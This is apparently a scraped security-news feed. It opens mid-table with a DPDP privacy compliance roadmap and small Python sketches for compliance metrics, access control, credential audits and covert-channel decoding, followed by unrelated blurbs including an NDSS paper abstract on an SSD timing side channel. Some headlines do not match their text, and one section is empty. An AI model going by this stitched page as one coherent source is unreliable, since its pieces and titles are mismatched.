| Children’s Data & Onboarding Friction | Age verification and parental consent slow user onboarding and impact conversion metrics | Direct revenue and growth impact if UX is not carefully redesigned | Re-engineer onboarding flows to balance compliance with user experience, especially in consumer platforms |
| Consent Manager Dependency & Systemic Risk | Outages or breaches at registered Consent Managers can affect multiple data fiduciaries simultaneously | Creates concentration and third-party systemic risk | Design fallback mechanisms, redundancy plans, and enforce strong SLAs and audit rights |

| Opportunity Area | Business Value | Strategic Outcome |
| --- | --- | --- |
| Trust as a Market Differentiator | Privacy becomes a competitive trust signal, particularly in fintech, healthtech, and BFSI ecosystems. | Strong DPDP compliance enhances brand equity, customer loyalty, partner confidence, and investor perception. |
| Operational Efficiency & Risk Reduction | Data minimization, encryption, and segmentation reduce storage costs and limit breach blast radius. | Privacy investments double as technical debt reduction with measurable ROI and lower incident recovery costs. |
| Global Market Access | Alignment with global privacy principles simplifies cross-border expansion and compliance-sensitive partnerships. | Faster deal closures, reduced due diligence friction, and improved access to regulated international markets. |
| Domestic Privacy & RegTech Ecosystem Growth | Demand for Consent Managers, RegTech, and privacy engineering solutions creates a new domestic market. | Strategic opportunity for Indian vendors to lead in privacy infrastructure and export DPDP-aligned solutions globally. |

| Time Horizon | Key Actions | Primary Owners | Strategic Outcome |
| --- | --- | --- | --- |
| Immediate (0–3 Months) | • Establish Board-level Privacy Steering Committee • Appoint or contract a Data Protection Officer (DPO) • Conduct rapid enterprise data mapping (repositories, processors, high-risk data flows) • Triage high-risk systems for encryption, access controls, and logging • Update breach response runbooks to meet Board and individual notification timelines | Board, CEO, CISO, Legal, Compliance | Executive accountability for privacy; clear visibility of data risk exposure; regulatory-ready breach response posture |
| Short Term (3–9 Months) | • Deploy consent management platform interoperable with upcoming Consent Managers • Standardize DPDP-compliant vendor contracts and initiate bulk vendor renegotiation/audits • Automate data principal request handling (identity verification, APIs, evidence trails) | CISO, CTO, Legal, Procurement, Product | Operational DPDP compliance at scale; reduced manual handling risk; strengthened third-party governance |
| Medium Term (9–18 Months) | • Implement data minimization and archival policies focused on high-sensitivity datasets • Embed Privacy Impact Assessments (PIAs) into product development (“privacy by design”) • Stress-test reliance on Consent Managers and negotiate resilience SLAs and contingency plans | Product, Engineering, CISO, Risk, Procurement | Sustainable compliance architecture; reduced long-term data liability; privacy-integrated product innovation |
| Ongoing (Board Dashboard Metrics) | • Consent fulfillment latency & revocation success rate • Mean time to detect and notify data breaches (aligned to regulatory windows) • % of sensitive data encrypted at rest and in transit • Vendor compliance score and DPA coverage | Board, CISO, Risk & Compliance | Continuous assurance, measurable compliance maturity, and defensible regulatory posture |
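Several of the board dashboard metrics listed in the roadmap reduce to simple ratios and averages. The Python sketch below rests on stated assumptions: the record shapes (`Incident`, `DataStore`) and the function names are hypothetical, and the notification window is supplied by the caller rather than taken from any specific DPDP rule.

```python
from dataclasses import dataclass
from statistics import mean


@dataclass
class Incident:
    hours_to_detect: float  # time from compromise to detection
    hours_to_notify: float  # time from detection to notification


@dataclass
class DataStore:
    name: str
    sensitive: bool
    encrypted_at_rest: bool
    encrypted_in_transit: bool


def revocation_success_rate(outcomes: list[bool]) -> float:
    """Fraction of consent revocations that completed everywhere (True)."""
    return sum(outcomes) / len(outcomes) if outcomes else 1.0


def mean_times(incidents: list[Incident]) -> tuple[float, float]:
    """Mean time to detect and mean time to notify, in hours.

    Raises statistics.StatisticsError if there are no incidents.
    """
    return (mean(i.hours_to_detect for i in incidents),
            mean(i.hours_to_notify for i in incidents))


def notified_within(incidents: list[Incident], window_hours: float) -> float:
    """Fraction of incidents notified within a caller-supplied window."""
    if not incidents:
        return 1.0
    return sum(i.hours_to_notify <= window_hours for i in incidents) / len(incidents)


def encryption_coverage(stores: list[DataStore]) -> float:
    """Percent of sensitive stores encrypted both at rest and in transit."""
    sensitive = [s for s in stores if s.sensitive]
    if not sensitive:
        return 100.0
    covered = sum(s.encrypted_at_rest and s.encrypted_in_transit for s in sensitive)
    return 100.0 * covered / len(sensitive)


if __name__ == "__main__":
    stores = [
        DataStore("crm", True, True, True),
        DataStore("logs", True, True, False),
        DataStore("cms", False, False, False),
    ]
    print(f"{encryption_coverage(stores):.1f}%")  # 50.0%
    print(revocation_success_rate([True, True, False, True]))  # 0.75
```

Only sensitive stores count toward encryption coverage, which keeps the metric aligned with the roadmap's "% of sensitive data" wording.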

Last week on Malwarebytes Labs:

Stay safe!


Bugcrowd unveils AI Triage Assistant and AI Analytics to help security teams proactively defend against AI-driven cyberattacks by accelerating vulnerability analysis, reducing MTTR, and enabling preemptive security decisions.

The post Bugcrowd Puts Defenders on the Offensive With AI Triage Assistant appeared first on Security Boulevard.

Learn how fine-grained access control protects sensitive Model Context Protocol (MCP) data. Discover granular policies, context-aware permissions, and quantum-resistant security for AI infrastructure.
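Fine-grained, context-aware access control usually means evaluating each request against attributes of the caller, the resource, and the surrounding context, and denying by default. The Python sketch below applies that idea to MCP tool calls. The `Rule`/`Request` shapes, the three sensitivity levels, and the tool name `crm.lookup` are hypothetical; they are not part of the MCP specification or any vendor's product.

```python
from dataclasses import dataclass

# Ordered sensitivity levels (hypothetical classification scheme).
LEVELS = {"public": 0, "internal": 1, "restricted": 2}


@dataclass(frozen=True)
class Request:
    principal: str        # calling user or AI agent
    roles: frozenset      # roles held by the principal
    tool: str             # MCP tool or resource being invoked
    action: str           # e.g. "read" or "write"
    sensitivity: str      # classification of the data touched
    device_trusted: bool  # contextual signal from the session


@dataclass(frozen=True)
class Rule:
    tool: str
    action: str
    required_role: str
    max_sensitivity: str
    require_trusted_device: bool = False


def is_allowed(req: Request, rules: list[Rule]) -> bool:
    """Default deny: permit only if one rule matches every attribute."""
    for rule in rules:
        if (rule.tool == req.tool
                and rule.action == req.action
                and rule.required_role in req.roles
                and LEVELS[req.sensitivity] <= LEVELS[rule.max_sensitivity]
                and (req.device_trusted or not rule.require_trusted_device)):
            return True
    return False


rules = [
    Rule("crm.lookup", "read", "support", "internal"),
    Rule("crm.lookup", "read", "finance", "restricted", require_trusted_device=True),
]
req = Request("agent-7", frozenset({"support"}), "crm.lookup", "read", "restricted", True)
print(is_allowed(req, rules))  # False: the support rule is capped at "internal"
```

Keeping rules as plain data makes them easy to review and audit; a production system would more likely use a dedicated policy engine.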

The post Fine-Grained Access Control for Sensitive MCP Data appeared first on Security Boulevard.

Understand the key differences between CIAM and IAM, and learn which identity management solution suits your business's customer and employee access needs.

The post CIAM vs IAM: Comparing Customer Identity and Identity Access Management appeared first on Security Boulevard.

United States of America’s NASA Astronaut Jessica Meir’s Hanukkah Wishes from the International Space Station: Happy Hanukkah to all those who celebrate it on Earth! (Originally Published in 2019)


The post Infosecurity.US Wishes All A Happy Hanukkah! appeared first on Security Boulevard.

Are You Overlooking the Security of Non-Human Identities in Your Cybersecurity Framework?

In a landscape bustling with technological advancements, security efforts often zoom in on human authentication and protection, leaving their non-human counterparts, Non-Human Identities (NHIs), in the shadows. Integrating NHIs into data security strategies is not just an added layer of protection but a necessity. […]

The post What makes Non-Human Identities crucial for data security appeared first on Entro.

The post What makes Non-Human Identities crucial for data security appeared first on Security Boulevard.

Why Are Non-Human Identities Essential for Secure Cloud Environments?

Organizations face a unique but critical challenge: securing non-human identities (NHIs) and their secrets within cloud environments. But why are NHIs increasingly pivotal for cloud security strategies?

Understanding Non-Human Identities and Their Role in Cloud Security

To comprehend the significance of NHIs, we must first explore […]

The post How do I implement Agentic AI in financial services appeared first on Entro.

The post How do I implement Agentic AI in financial services appeared first on Security Boulevard.

What Challenges Do Organizations Face When Managing NHIs?

Organizations often face unique challenges when managing Non-Human Identities (NHIs). A critical aspect that enterprises must navigate is the delicate balance between security and innovation. NHIs, essentially machine identities, require meticulous attention when they bridge the gap between security teams and research and development (R&D) units. For […]

The post What are the best practices for managing NHIs appeared first on Entro.

The post What are the best practices for managing NHIs appeared first on Security Boulevard.

What Role Do Non-Human Identities Play in Securing Our Digital Ecosystems?

As more organizations migrate to the cloud, securing Non-Human Identities (NHIs) is becoming increasingly crucial. NHIs, essentially machine identities, are pivotal in maintaining robust cybersecurity frameworks. They are a unique combination of encrypted passwords, tokens, or keys, which are akin to […]
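NHIs are built from passwords, tokens, or keys, so one common hygiene check is to audit those credentials for missing expiry, stale rotation, and missing ownership. The Python sketch below assumes a hypothetical inventory format and a 90-day rotation limit chosen only for illustration; neither comes from the excerpt.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional

MAX_AGE = timedelta(days=90)  # illustrative rotation limit, not a standard


@dataclass
class MachineCredential:
    name: str                    # e.g. a service-account key or API token
    kind: str                    # "password", "token", or "key"
    issued: datetime
    expires: Optional[datetime]  # None means the secret never expires
    owner: Optional[str]         # accountable team, if one is recorded


def audit(creds: list[MachineCredential], now: datetime,
          max_age: timedelta = MAX_AGE) -> list[tuple[str, str]]:
    """Return (credential name, finding) pairs for policy violations."""
    findings = []
    for c in creds:
        if c.expires is None:
            findings.append((c.name, "never expires"))
        if now - c.issued > max_age:
            findings.append((c.name, "not rotated within max age"))
        if not c.owner:
            findings.append((c.name, "no owner"))
    return findings


now = datetime(2025, 12, 15, tzinfo=timezone.utc)
inventory = [
    MachineCredential("ci-deploy-key", "key", now - timedelta(days=400), None, None),
    MachineCredential("billing-api-token", "token", now - timedelta(days=10),
                      now + timedelta(days=20), "payments-team"),
]
for name, finding in audit(inventory, now):
    print(name, "->", finding)
```

Passing `now` explicitly keeps the audit deterministic and easy to test; a real inventory would come from a secrets manager or cloud IAM export.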

The post How can Agentic AI enhance our cybersecurity measures appeared first on Entro.

The post How can Agentic AI enhance our cybersecurity measures appeared first on Security Boulevard.

Session 5D: Side Channels 1

Authors, Creators & Presenters: Jonas Juffinger (Graz University of Technology), Fabian Rauscher (Graz University of Technology), Giuseppe La Manna (Amazon), Daniel Gruss (Graz University of Technology)

PAPER

Secret Spilling Drive: Leaking User Behavior through SSD Contention

Covert channels and side channels bypass architectural security boundaries. Numerous works have studied covert channels and side channels in software and hardware. Thus, research on covert-channel and side-channel mitigations relies on the discovery of leaky hardware and software components. In this paper, we perform the first study of timing channels inside modern commodity off-the-shelf SSDs. We systematically analyze the behavior of NVMe PCIe SSDs with concurrent workloads. We observe that exceeding the maximum I/O operations of the SSD leads to significant latency spikes. We narrow down the number of I/O operations required to still induce latency spikes on 12 different SSDs. Our results show that a victim process needs to read at least 8 to 128 blocks to still be detectable by an attacker. Based on these experiments, we show that an attacker can build a covert channel, where the sender encodes secret bits into read accesses to unrelated blocks, inaccessible to the receiver. We demonstrate that this covert channel works across different systems and different SSDs, even from processes running inside a virtual machine. Our unprivileged SSD covert channel achieves a true capacity of up to 1503 bit/s while it works across virtual machines (cross-VM) and is agnostic to operating system versions, as well as other hardware characteristics such as CPU or DRAM. Given the coarse granularity of the SSD timing channel, we evaluate it as a side channel in an open-world website fingerprinting attack over the top 100 websites. We achieve an F1 score of up to 97.0. This shows that the leakage goes beyond covert communication and can leak highly sensitive information from victim users. Finally, we discuss the root cause of the SSD timing channel and how it can be mitigated.
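The abstract's covert channel relies on contention: read bursts that exceed the SSD's I/O capacity cause latency spikes the receiver can observe in its own reads. The Python sketch below shows the receiver's decoding step and a true-capacity calculation. It assumes on-off keying per time slot (a read burst for 1, idle for 0), a fixed latency threshold, and the common binary-symmetric-channel definition of true capacity, raw rate × (1 - H(p)). The latencies and the 1000 bit/s raw rate are made-up illustration values, not measurements from the paper.

```python
import math


def decode_bits(latencies_us: list[float], threshold_us: float) -> list[int]:
    """Receiver: a slot whose probe latency exceeds the threshold reads as 1."""
    return [1 if t > threshold_us else 0 for t in latencies_us]


def error_rate(sent: list[int], received: list[int]) -> float:
    """Fraction of slots decoded incorrectly (bit error rate)."""
    return sum(s != r for s, r in zip(sent, received)) / len(sent)


def binary_entropy(p: float) -> float:
    """H(p) in bits; defined as 0 at p = 0 and p = 1."""
    if p in (0.0, 1.0):
        return 0.0
    return -p * math.log2(p) - (1 - p) * math.log2(1 - p)


def true_capacity(raw_bits_per_s: float, p: float) -> float:
    """Binary symmetric channel capacity: raw rate * (1 - H(p))."""
    return raw_bits_per_s * (1 - binary_entropy(p))


# Made-up example: sender transmits 1 as a read burst, 0 as idle.
sent = [1, 0, 1, 1, 0, 0, 1, 0]
latencies = [410.0, 95.0, 380.0, 120.0, 88.0, 102.0, 395.0, 97.0]  # microseconds
received = decode_bits(latencies, threshold_us=250.0)
p = error_rate(sent, received)  # one flipped bit -> 0.125
print(f"{true_capacity(1000.0, p):.1f} bit/s")  # 456.4 bit/s
```

Errors reduce capacity faster than they reduce raw throughput: at a 12.5% bit error rate, more than half of the raw rate is lost. At 50% the channel carries no information at all.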

ABOUT NDSS

The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.

Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing its creators', authors', and presenters' superb NDSS Symposium 2025 conference content on the organization's YouTube channel.

The post NDSS 2025 – Secret Spilling Drive: Leaking User Behavior Through SSD Contention appeared first on Security Boulevard.

This is a current list of where and when I am scheduled to speak:

The list is maintained on this page.

Wireshark release 4.6.2 fixes 2 vulnerabilities and 5 bugs.

The Windows installers now ship with the Visual C++ Redistributable version 14.44.35112. This required a reboot of my laptop.

Didier Stevens

Senior handler

blog.DidierStevens.com

How can we describe the past year in cybersecurity? No doubt, AI was front and center in so many conversations, and now there’s no going back. Here’s why.

The post 2025: The Year Cybersecurity Crossed the AI Rubicon appeared first on Security Boulevard.

What is the LGPD (Brazil)? The Lei Geral de Proteção de Dados Pessoais (LGPD), or General Data Protection Law (Law No. 13.709/2018), is Brazil’s comprehensive data protection framework, inspired by the European Union’s GDPR. It regulates the collection, use, storage, and sharing of personal data, applying to both public and private entities, regardless of industry, […]

The post LGPD (Brazil) appeared first on Centraleyes.

The post LGPD (Brazil) appeared first on Security Boulevard.